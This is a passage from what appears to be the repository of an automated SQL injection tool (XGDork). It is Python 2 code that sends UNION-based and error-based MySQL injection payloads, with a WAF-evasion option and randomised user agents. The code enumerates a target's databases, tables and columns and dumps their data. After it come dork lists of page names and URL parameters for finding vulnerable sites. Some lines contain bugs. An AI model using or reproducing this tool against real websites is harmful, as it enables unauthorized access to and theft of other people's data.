">duplicate entry '"): 385 | 386 | i += 1 387 | ca = i 388 | while (i < len(data)-1 and data[i] != limiter): 389 | i += 1 390 | cb = i 391 | tmp = block_cutter(data, ca, cb-1) 392 | data_list.append(tmp) 393 | print colored(" "+tmp, 'yellow') 394 | 395 | #return data_list 396 | return tmp 397 | i += 1 398 | 399 | 400 | 401 | 402 | def dumpDatabase (url, param, waf, modx, nc, idx): 403 | burl = "" 404 | nurl = "" 405 | data = "" 406 | rangestr = "" 407 | database_list = [] 408 | tmpfile = file 409 | 410 | user_agent = rand_agent() 411 | headers = {'User-Agent': user_agent} 412 | print colored(" [+] User-Agent: "+user_agent, 'green') 413 | 414 | burl = focpa(url, param) 415 | 416 | if (modx == 1): 417 | nurl = burl 418 | rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))") 419 | nurl += "-1984 UNION SELECT "+rangestr+" --" 420 | if (waf == 1): 421 | nurl = sbws(nurl) 422 | #print (nurl) 423 | 424 | r = requests.get(nurl, headers=headers) 425 | data = r.text.encode('utf-8') 426 | 427 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 428 | print colored(" [*] Change syntax ... ", 'cyan') 429 | nurl = burl 430 | rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),@@version,database(),CHAR(040,118,035,118,041))") 431 | nurl += "-1984 UNION SELECT "+rangestr+" --" 432 | if (waf == 1): 433 | nurl = sbws(nurl) 434 | #print (nurl) 435 | r = requests.get(nurl, headers=headers) 436 | data = r.text.encode('utf-8') 437 | 438 | database_list = parserDump(data, 1) 439 | else: 440 | database_list = parserDump(data, 1) 441 | 442 | if (len(database_list) > 0): 443 | print colored(" [+] URL is injectable", 'green') 444 | print (str(database_list)) 445 | 446 | tmpfile = open("tmpfile", 'w') 447 | tmpfile.write(str(modx)+"\n") 448 | tmpfile.write(str(waf)+"\n") 449 | tmpfile.write(database_list[0]+"\n") 450 | tmpfile.write(str(nc)+"\n") 451 | tmpfile.write(str(idx)+"\n") 452 | tmpfile.close() 453 | 454 | return database_list 455 | else: 456 | print colored(" [-] Injection attempt failed ", 'red') 457 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 458 | exit(0) 459 | 460 | 461 | elif (modx == 2): 462 | nurl = burl 463 | nurl += "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --" 464 | if (waf == 1): 465 | nurl = sbws(nurl) 466 | #print (nurl) 467 | r = requests.get(nurl, headers=headers) 468 | data = r.text.encode('utf-8') 469 | 470 | if (data.find("(^#^)") == -1): 471 | print colored(" [*] Change syntax ... ", 'cyan') 472 | nurl = burl 473 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FL0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 474 | if (waf == 1): 475 | nurl = sbws(nurl) 476 | #print (nurl) 477 | r = requests.get(nurl, headers=headers) 478 | data = r.text.encode('utf-8') 479 | if (data.find("(^#^)") == -1): 480 | print colored(" [*] Change syntax ... ", 'cyan') 481 | nurl = burl 482 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 483 | if (waf == 1): 484 | nurl = sbws(nurl) 485 | #print (nurl) 486 | r = requests.get(nurl, headers==headers) 487 | data = r.text.encode('utf-8') 488 | 489 | tmp = str(parserDump(data, 1)) 490 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 491 | 492 | else: 493 | tmp = str(parserDump(data, 1)) 494 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 495 | else: 496 | tmp = str(parserDump(data, 1)) 497 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 498 | 499 | if (tmp != ''): 500 | print colored(" [+] URL appears as injectable ...", 'green') 501 | database_list.append(tmp) 502 | nurl = burl 503 | nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(database() AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --" 504 | if (waf == 1): 505 | nurl = sbws(nurl) 506 | #print (nurl) 507 | r = requests.get(nurl, headers=headers) 508 | data = r.text.encode('utf-8') 509 | if (data.find("(^#^)") == -1): 510 | print colored(" [*] Change syntax ... ", 'cyan') 511 | nurl = burl 512 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 513 | if (waf == 1): 514 | nurl = sbws(nurl) 515 | #print (nurl) 516 | r = requests.get(nurl, headers=headers) 517 | data = r.text.encode('utf-8') 518 | if (data.find("(^#^)") == -1): 519 | print colored(" [*] Change syntax ... ", 'cyan') 520 | nurl = burl 521 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 522 | if (waf == 1): 523 | nurl = sbws(nul) 524 | #print (nurl) 525 | r = requests.get(nurl, headers=headers) 526 | data = r.text.encode('utf-8') 527 | 528 | tmp = str(parserDump(data, 1)) 529 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 530 | 531 | else: 532 | tmp = str(parserDump(data, 1)) 533 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 534 | 535 | else: 536 | tmp = str(parserDump(data, 1)) 537 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 538 | 539 | if (tmp != ''): 540 | database_list.append(tmp) 541 | else: 542 | print colored(" [-] Injection attempt failed ", 'red') 543 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 544 | exit(0) 545 | else: 546 | print colored(" [-] Injection attempt failed ", 'red') 547 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 548 | exit(0) 549 | 550 | if (len(database_list) > 1): 551 | print colored(" [+] URL is injectable", 'green') 552 | print (str(database_list)) 553 | tmpfile = open("tmpfile", 'w') 554 | tmpfile.write(str(modx)+"\n") 555 | tmpfile.write(str(waf)+"\n") 556 | tmpfile.write(str(database_list[1])+"\n") 557 | tmpfile.write(str(nc)+"\n") 558 | tmpfile.write(str(idx)+"\n") 559 | tmpfile.close() 560 | 561 | return database_list 562 | else: 563 | print colored(" [-] Injection attempt failed ", 'red') 564 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 565 | exit(0) 566 | 567 | 568 | 569 | def dumpTables (url, param, waf, modx, nc, idx): 570 | burl = "" 571 | nurl = "" 572 | data = "" 573 | rangestr = "" 574 | tmp = "" 575 | stress = 0 576 | error_syntax = 0 577 | i = 0 578 | tables_list = [] 579 | 580 | user_agent = rand_agent() 581 | headers = {'User-Agent': user_agent} 582 | print colored(" [+] User-Agent: "+user_agent, 'green') 583 | 584 | burl = focpa(url, param) 585 | 586 | if (modx == 1): 587 | nurl = burl 588 | rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),TABLE_NAME,CHAR(040,118,035,118,041))") 589 | nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() --" 590 | if (waf == 1): 591 | nurl = sbws(nurl) 592 | #print (nurl) 593 | r = requests.get(nurl, headers=headers) 594 | data = r.text.encode('utf-8') 595 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 596 | print colored(" [*] Change syntax ... ", 'cyan') 597 | rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),TABLE_NAME,CHAR(040,118,035,118,041))") 598 | while (stress == 0): 599 | nurl = burl 600 | nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE database() LIMIT "+str(i)+",1 --" 601 | if (waf == 1): 602 | nurl = sbws(nurl) 603 | #print(nurl) 604 | 605 | r = requests.get(nurl, headers=headers) 606 | data = r.text.encode('utf-8') 607 | 608 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 609 | stress = 1 610 | 611 | tmp = str(parserDump(data, 1)) 612 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 613 | if (tmp != ''): 614 | tables_list.append(tmp) 615 | 616 | i += 1 617 | else: 618 | tables_list = parserDump(data, 0) 619 | 620 | if (len(tables_list) > 0): 621 | print (str(tables_list)) 622 | return tables_list 623 | else: 624 | print colored(" [-] Injection attempt failed ", 'red') 625 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 626 | exit(0) 627 | 628 | elif (modx == 2): 629 | while (stress == 0): 630 | nurl = burl 631 | if (error_syntax == 0): 632 | nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(TABLE_NAME AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --" 633 | elif (error_syntax == 1): 634 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,TABLE_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=database() LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 635 | elif (error_syntax == 2): 636 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,TABLE_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE database() LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 637 | 638 | if (waf == 1): 639 | nurl = sbws(nurl) 640 | #print (nurl) 641 | r = requests.get(nurl, headers=headers) 642 | data = r.text.encode('utf-8') 643 | 644 | if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Subquery returns more than 1 row") > -1 or data.find("this is incompatible ") > -1 or data.find("Nothing found!") > -1 or data.find("not found") > -1 and data.find("(^#^)") == -1): 645 | print colored(" [*] Change syntax ... ", 'cyan') 646 | error_syntax += 1 647 | i = 0 648 | else: 649 | tmp = str(parserDump(data, 1)) 650 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 651 | if (tmp != ''): 652 | tables_list.append(tmp) 653 | else: 654 | stress = 1 655 | 656 | i += 1 657 | 658 | if (len(tables_list) > 0): 659 | print (str(tables_list)) 660 | return tables_list 661 | else: 662 | print colored(" [-] Injection attempt failed ", 'red') 663 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 664 | exit(0) 665 | 666 | 667 | 668 | def dumpColumns (url, param, waf, modx, nc, idx, table): 669 | burl = "" 670 | nurl = "" 671 | data = "" 672 | tmp = "" 673 | rangestr = "" 674 | stress = 0 675 | error_syntax = 0 676 | i = 0 677 | columns_list = [] 678 | 679 | user_agent = rand_agent() 680 | headers = {'User-Agent': user_agent} 681 | print colored(" [+] User-Agent: "+user_agent, 'green') 682 | 683 | 684 | burl = focpa(url, param) 685 | 686 | if (modx == 1): 687 | nurl = burl 688 | rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))") 689 | nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME='"+table+"' --" 690 | if (waf == 1): 691 | nurl = sbws(nurl) 692 | #print (nurl) 693 | 694 | r = requests.get(nurl, headers=headers) 695 | data = r.text.encode('utf-8') 696 | 697 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 698 | print colored(" [*] Change syntax ... ", 'cyan') 699 | nurl = burl 700 | nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME LIKE 0x"+str(table).encode('hex')+" --" 701 | if (waf == 1): 702 | nurl = sbws(nurl) 703 | #print (nurl) 704 | r = requests.get(nurl, headers=headers) 705 | data = r.text.encode('utf-8') 706 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 707 | print colored(" [*] Change syntax ... ", 'cyan') 708 | rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),COLUMN_NAME,CHAR(040,118,035,118,041))") 709 | while (stress == 0): 710 | nurl = burl 711 | nurl += "-1984 UNION SELECT "+rangestr+" FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME LIKE 0x"+str(table).encode('hex')+" LIMIT "+str(i)+",1 --" 712 | if (waf == 1): 713 | nurl = sbws(nurl) 714 | #print (nurl) 715 | r = requests.get(nurl, headers=headers) 716 | data = r.text.encode('utf-8') 717 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 718 | stress = 1 719 | 720 | tmp = str(parserDump(data, 1)) 721 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 722 | if (tmp != ''): 723 | columns_list.append(tmp) 724 | 725 | i += 1 726 | 727 | else: 728 | columns_list = parserDump(data, 0) 729 | 730 | else: 731 | columns_list = parserDump(data, 0) 732 | 733 | if (len(columns_list) > 0): 734 | print (str(columns_list)) 735 | return columns_list 736 | else: 737 | print colored(" [-] Injection attempt failed ", 'red') 738 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 739 | exit(0) 740 | 741 | 742 | elif (modx == 2): 743 | while (stress == 0): 744 | nurl = burl 745 | if (error_syntax == 0): 746 | nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,CAST(COLUMN_NAME AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x"+table.encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --" 747 | elif (error_syntax == 1): 748 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=database() AND TABLE_NAME=0x"+table.encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 749 | elif (error_syntax == 2): 750 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,COLUMN_NAME,0x28,0x56,0x23,0x56,0x29) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE database() AND TABLE_NAME=0x"+table.encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 751 | 752 | if (waf == 1): 753 | nurl = sbws(nurl) 754 | #print (nurl) 755 | r = requests.get(nurl, headers=headers) 756 | data = r.text.encode('utf-8') 757 | 758 | if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Subquery returns more than 1 row") > -1 or data.find("this is incompatible ") > -1 or data.find("Nothing found!") > -1 or data.find("not found") > -1 and data.find("(^#^)") == -1): 759 | print colored(" [*] Change syntax ... ", 'cyan') 760 | error_syntax += 1 761 | i = 0 762 | else: 763 | tmp = str(parserDump(data, 1)) 764 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 765 | if (tmp != ''): 766 | columns_list.append(tmp) 767 | else: 768 | stress = 1 769 | 770 | i += 1 771 | 772 | if (len(columns_list) > 0): 773 | print (str(columns_list)) 774 | return columns_list 775 | else: 776 | print colored(" [-] Injection attempt failed ", 'red') 777 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 778 | exit(0) 779 | 780 | 781 | 782 | 783 | def dumpData_s (url, param, waf, modx, nc, idx, table, fields, dbx): 784 | burl = "" 785 | nurl = "" 786 | data = "" 787 | tmp = "" 788 | tmp_l = "" 789 | rangestr = "" 790 | stress = 0 791 | error_syntax = 0 792 | i = 0 793 | j = 0 794 | data_s_list = [] 795 | 796 | 797 | user_agent = rand_agent() 798 | headers = {'User-Agent': user_agent} 799 | print colored(" [+] User-Agent: "+user_agent, 'green') 800 | 801 | burl = focpa(url, param) 802 | 803 | if (modx == 1): 804 | nurl = burl 805 | insertFields = turing_fields(fields) 806 | rangestr = turing_range(nc, idx, "GROUP_CONCAT(CHAR(040,094,035,094,041),"+str(insertFields)+",CHAR(040,118,035,118,041))") 807 | nurl += "-1984 UNION SELECT "+rangestr+" FROM '"+table+"' --" 808 | if (waf == 1): 809 | nurl = sbws(nurl) 810 | #print (nurl) 811 | r = requests.get(nurl, headers=headers) 812 | data = r.text.encode('utf-8') 813 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 814 | print colored(" [*] Change syntax ... ", 'cyan') 815 | nurl = burl 816 | nurl += "-1984 UNION SELECT "+rangestr+" FROM 0x"+str(table.encode('hex'))+" --" 817 | if (waf == 1): 818 | nurl = sbws(nurl) 819 | #print (nurl) 820 | r = requests.get(nurl, headers=headers) 821 | data = r.text.encode('utf-8') 822 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 823 | print colored(" [*] Change syntax ... ", 'cyan') 824 | while (stress == 0): 825 | nurl = burl 826 | j = 0 827 | while (j < len(fields) and stress == 0): 828 | nurl = burl 829 | rangestr = turing_range(nc, idx, "CONCAT(CHAR(040,094,035,094,041),"+str(fields[j])+",CHAR(040,118,035,118,041))") 830 | nurl += "-1984 UNION SELECT "+rangestr+" FROM "+table+" LIMIT "+str(i)+",1 --" 831 | if (waf == 1): 832 | nurl = sbws(nurl) 833 | #print (nurl) 834 | r = requests.get(nurl, headers=headers) 835 | data = r.text.encode('utf-8') 836 | 837 | tmp = str(parserDump(data, 1)) 838 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 839 | if (tmp != ''): 840 | tmp_l += " " 841 | tmp_l += tmp 842 | 843 | j += 1 844 | 845 | if (data.find("(V#V)") == -1 and data.find("(^#^)") == -1): 846 | stress = 1 847 | 848 | if (tmp_l != ''): 849 | data_s_list.append(tmp_l) 850 | 851 | i += 1 852 | else: 853 | data_s_list = parserDump(data, 0) 854 | else: 855 | data_s_list = parserDump(data, 0) 856 | 857 | if (len(data_s_list) > 0): 858 | print (str(data_s_list)) 859 | return data_s_list 860 | else: 861 | print colored(" [-] Injection attempt failed ", 'red') 862 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 863 | exit(0) 864 | 865 | elif (modx == 2): 866 | insertFields = turing_fields(fields) 867 | while (stress == 0): 868 | nurl = burl 869 | if (error_syntax == 0): 870 | nurl += "1 AND (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(0x28,0x5e,0x23,0x5e,0x29,CONCAT("+str(insertFields)+") AS CHAR),0x28,0x56,0x23,0x56,0x29)) FROM "+str(dbx)+"."+str(table)+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --" 871 | if (waf == 1): 872 | nurl = sbws(nurl) 873 | #print (nurl) 874 | r = requests.get(nurl, headers=headers) 875 | data = r.text.encode('utf-8') 876 | if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Subquery returns more than 1 row") > -1 or data.find("this is incompatible ") > -1 or data.find("Nothing found!") > -1 or data.din("Not found") > -1 and data.find("(^#^)") == -1): 877 | stress = 1 878 | error_syntax += 1 879 | i = 0 880 | else: 881 | tmp = str(parserDump(data, 1)) 882 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 883 | if (tmp != ''): 884 | data_s_list.append(tmp) 885 | else: 886 | stress = 1 887 | 888 | i += 1 889 | if (len(data_s_list) > 0): 890 | print (str(data_s_list)) 891 | return data_s_list 892 | 893 | print colored(" [*] Change syntax ... ", 'cyan') 894 | stress = 0 895 | i = 0 896 | while (stress == 0): 897 | j = 0 898 | while (j < len(fields)): 899 | nurl = burl 900 | if (error_syntax == 1): 901 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,"+str(fields[j])+",0x28,0x56,0x23,0x56,0x29) FROM "+str(dbx)+"."+str(table)+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 902 | elif (error_syntax == 2): 903 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,"+str(fields[j])+",0x28,0x56,0x23,0x56,0x29) FROM "+str(table)+"="+str(dbx)+"."+str(table).encode('hex')+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 904 | elif (error_syntax == 3): 905 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(0x28,0x5e,0x23,0x5e,0x29,"+str(fields[j])+",0x28,0x56,0x23,0x56,0x29) FROM "+str(dbx)+"."+str(table)+" LIMIT "+str(i)+",1),FLOOR(RAND(0)*2))x FROM "+str(dbx)+"."+str(table)+" GROUP BY x)a) --" 906 | 907 | if (waf == 1): 908 | nurl = sbws(nurl) 909 | #print (nurl) 910 | r = requests.get(nurl, headers=headers) 911 | data = r.text.encode('utf-8') 912 | 913 | if (data.find("You have an error in your SQL syntax;") > -1 or data.find("Error in SQL Query") > -1 and data.find("(^#^)") == -1): 914 | print colored(" [*] Change syntax ... ", 'cyan') 915 | error_syntax += 1 916 | i = 0 917 | 918 | else: 919 | tmp = str(parserDump(data, 1)) 920 | tmp = tmp.replace('[', '').replace(']', '').replace("'", '') 921 | tmp_l += " " 922 | tmp_l += tmp 923 | 924 | j += 1 925 | 926 | if (data.find("(^#^)") == -1): 927 | stress = 1 928 | if (tmp_l != ''): 929 | data_s_list.append(tmp_l) 930 | tmp_l = "" 931 | else: 932 | stress = 1 933 | 934 | i += 1 935 | 936 | if (len(data_s_list) > 0): 937 | print (str(data_s_list)) 938 | return data_s_list 939 | else: 940 | print colored(" [-] Injection attempt failed ", 'red') 941 | print colored(" [*] Try Manually (it's more Fun and Education) or use SQLmap (it's eZ')", 'red') 942 | exit(0) 943 | 944 | 945 | 946 | 947 | 948 | def MOCA (url, param, mod, table, fields): 949 | tmpfile = file 950 | su = [] 951 | nc = 0 952 | idx = 0 953 | modx = 0 954 | waf = 0 955 | 956 | if (mod == 1): 957 | IP_PO = ipuser() 958 | print colored(" [*] Public IP overview: "+IP_PO, 'blue') 959 | 960 | su = stress_url(url, param) 961 | if (su[1] == 1): 962 | nc = count_nc(url, param, su[0]) 963 | idx = id_checker(url, param, su[0], nc) 964 | dumpDatabase(url, param, su[0], su[1], nc, idx) 965 | elif (su[1] == 2): 966 | dumpDatabase(url, param, su[0], su[1], 0, 0) 967 | elif (su[1] == 3): 968 | nc = heuristic_nc(url, param, su[0]) 969 | idx = id_checker(url, param, su[0], nc) 970 | dumpDatabase(url, param, su[0], 1, nc, idx) 971 | 972 | elif (mod == 2): 973 | tmpfile = open("tmpfile", 'r') 974 | modx = int(tmpfile.readlines()[0].replace('\n', '')) 975 | tmpfile.close() 976 | tmpfile = open("tmpfile", 'r') 977 | waf = int(tmpfile.readlines()[1].replace('\n', '')) 978 | tmpfile.close() 979 | tmpfile = open("tmpfile", 'r') 980 | nc = int(tmpfile.readlines()[3].replace('\n', '')) 981 | tmpfile.close() 982 | tmpfile = open("tmpfile", 'r') 983 | idx = int(tmpfile.readlines()[4].replace('\n', '')) 984 | tmpfile.close() 985 | 986 | dumpTables(url, param, waf, modx, nc, idx) 987 | 988 | elif (mod == 3): 989 | tmpfile = open("tmpfile", 'r') 990 | modx = int(tmpfile.readlines()[0].replace('\n', '')) 991 | tmpfile.close() 992 | tmpfile = open("tmpfile", 'r') 993 | waf = int(tmpfile.readlines()[1].replace('\n', '')) 994 | tmpfile.close() 995 | tmpfile = open("tmpfile", 'r') 996 | nc = int(tmpfile.readlines()[3].replace('\n', '')) 997 | tmpfile.close() 998 | tmpfile = open("tmpfile", 'r') 999 | idx = int(tmpfile.readlines()[4].replace('\n', '')) 1000 | tmpfile.close() 1001 | 1002 | dumpColumns(url, param, waf, modx, nc, idx, table) 1003 | 1004 | elif (mod == 4): 1005 | tmpfile = open("tmpfile", 'r') 1006 | modx = int(tmpfile.readlines()[0].replace('\n', '')) 1007 | tmpfile.close() 1008 | tmpfile = open("tmpfile", 'r') 1009 | waf = int(tmpfile.readlines()[1].replace('\n', '')) 1010 | tmpfile.close() 1011 | tmpfile = open("tmpfile", 'r') 1012 | nc = int(tmpfile.readlines()[3].replace('\n', '')) 1013 | tmpfile.close() 1014 | tmpfile = open("tmpfile", 'r') 1015 | idx = int(tmpfile.readlines()[4].replace('\n', '')) 1016 | tmpfile.close() 1017 | tmpfile = open("tmpfile", 'r') 1018 | dbx = str(tmpfile.readlines()[2].replace('\n', '')) 1019 | tmpfile.close() 1020 | 1021 | dumpData_s(url, param, waf, modx, nc, idx, table, fields, dbx) 1022 | 1023 | 1024 | 1025 | 1026 | 1027 | 1028 | 1029 | -------------------------------------------------------------------------------- /gd_data.txt: -------------------------------------------------------------------------------- 1 | 2 | ' 3 | 1 4 | 5 5 | 55 6 | -------------------------------------------------------------------------------- /gd_ext.txt: -------------------------------------------------------------------------------- 1 | .php? 2 | .php* 3 | -------------------------------------------------------------------------------- /gd_keywords.txt: -------------------------------------------------------------------------------- 1 | 2 | book 3 | article 4 | shop 5 | shopping 6 | -------------------------------------------------------------------------------- /gd_namespage.txt: -------------------------------------------------------------------------------- 1 | index 2 | /index 3 | article 4 | /article 5 | articles 6 | /articles 7 | page 8 | /page 9 | pages 10 | /pages 11 | prod 12 | /prod 13 | product 14 | /product 15 | products 16 | /products 17 | products_list 18 | productslist 19 | /products/list 20 | content 21 | /content 22 | /content/item 23 | detail 24 | /detail 25 | details 26 | /details 27 | board 28 | /board 29 | view 30 | /view 31 | store 32 | /store 33 | /store/products/product 34 | new 35 | /new 36 | news 37 | /news 38 | /news/item 39 | item 40 | /item 41 | items 42 | /items 43 | rss 44 | /rss 45 | book 46 | /book 47 | bookpage 48 | /bookpage 49 | bookpages 50 | /bookpages 51 | view-item 52 | /view-item 53 | cart 54 | /cart 55 | view-cart 56 | /view-cart 57 | shop 58 | /shop 59 | shopping 60 | /shopping/items 61 | add 62 | /add 63 | add-cart 64 | /add-cart 65 | author 66 | /author 67 | view-author 68 | /view-author 69 | forum/view 70 | /forum/viewtopic 71 | topic 72 | /topic 73 | -------------------------------------------------------------------------------- /gd_params.txt: -------------------------------------------------------------------------------- 1 | id= 2 | ID= 3 | iD= 4 | Id= 5 | cat= 6 | CAT= 7 | catid= 8 | catID= 9 | CATid= 10 | CATID= 11 | cat-id= 12 | cat_id= 13 | cat_ID= 14 | cat_Id= 15 | cPath= 16 | ref= 17 | page= 18 | prod= 19 | prodid= 20 | prod_id= 21 | product_id= 22 | pid= 23 | bookid= 24 | book-id= 25 | book_id= 26 | num= 27 | id_num= 28 | cid= 29 | CID= 30 | cID= 31 | Cid= 32 | -------------------------------------------------------------------------------- /version.txt: -------------------------------------------------------------------------------- 1 | 2 | --- XGDork --- 3 | 4 | version : final-1.0k2 FreeSoftware 5 | Final-open 6 | 7 | --- ------ --- 8 | 9 | 'agents.txt' file made by SQLmap Dev/team 10 | SQLmap - https://github.com/sqlmapproject/ 11 | 12 | 13 | 14 | --- UPDATES --- 15 | 16 | (Update coming soon...) 17 | 18 | [final-1.0k2] 19 | - Fix SPGKey Error for Bypass mode 20 | 21 | [final-1.0k] 22 | - Fix SPGKey Error for Bypass mode 23 | 24 | [final-1.0] 25 | - Some corrections 26 | - Minor modifications 27 | - Add of various options in addition 28 | - Add simple tools 29 | - Aesthetic of the program 30 | - Add additional various information 31 | 32 | [b0.9.0] 33 | - Add of various information 34 | - Aestheticism of the program 35 | - Some corrections, minor modifications 36 | 